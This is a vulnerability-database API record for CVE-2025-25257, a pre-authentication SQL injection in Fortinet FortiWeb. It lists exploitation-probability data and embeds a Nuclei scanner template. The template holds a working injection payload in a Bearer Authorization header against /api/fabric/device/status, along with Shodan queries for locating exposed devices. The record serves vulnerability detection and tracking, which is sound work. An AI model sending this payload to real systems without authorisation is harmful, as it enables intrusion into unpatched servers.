{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-25257/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-25257/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-25257/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-25257/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-25257/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-25257"},"sightings":{"href":"/api/v1/sightings/cve-2025-25257"}},"enrichments":{"cisa-kev":{"kev":true},"epss":{"epss":0.99775,"kev":true,"percentile":0.99955},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-25257.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2025-25257\n\ninfo:\n  name: Fortinet FortiWeb - SQL Injection\n  author: watchtowr,johnk3r\n  severity: critical\n  description: |\n    An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] in FortiWeb may allow an unauthenticated attacker to execute unauthorized SQL code or commands via crafted HTTP or HTTPS requests.\n  impact: |\n    An attacker can exploit this vulnerability to execute unauthorized SQL commands, potentially leading to data exposure, data manipulation, or system compromise.\n  remediation: |\n    Apply the latest security patches provided by Fortinet to fix the SQL injection vulnerability in FortiWeb.\n  reference:\n    - https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/\n    - https://fortiguard.fortinet.com/psirt/FG-IR-25-151\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-25257\n    epss-score: 0.99775\n    epss-percentile: 0.99955\n    cwe-id: CWE-89\n    cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: fortinet\n    product: fortiweb\n    shodan-query:\n      - ssl:\"cn=fortiweb\"\n      - title:\"FortiWeb - \"\n  tags: cve,cve2025,fortinet,fortiweb,sqli,unauth,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /api/fabric/device/status HTTP/1.1\n        Host: {{Hostname}}\n        Authorization: Bearer AAAAAA'or'1'='1\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'serial'\n          - 'fortiweb'\n          - 'device_type'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502200f6992a0575e159fd316ca0c0cda9b9e620af90dc105ccc35016f4e76ace094a02210092464a5abdbe143665485b42e6379af83df14d25ca8df32fa4cbaea707686a73:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2025-25257"}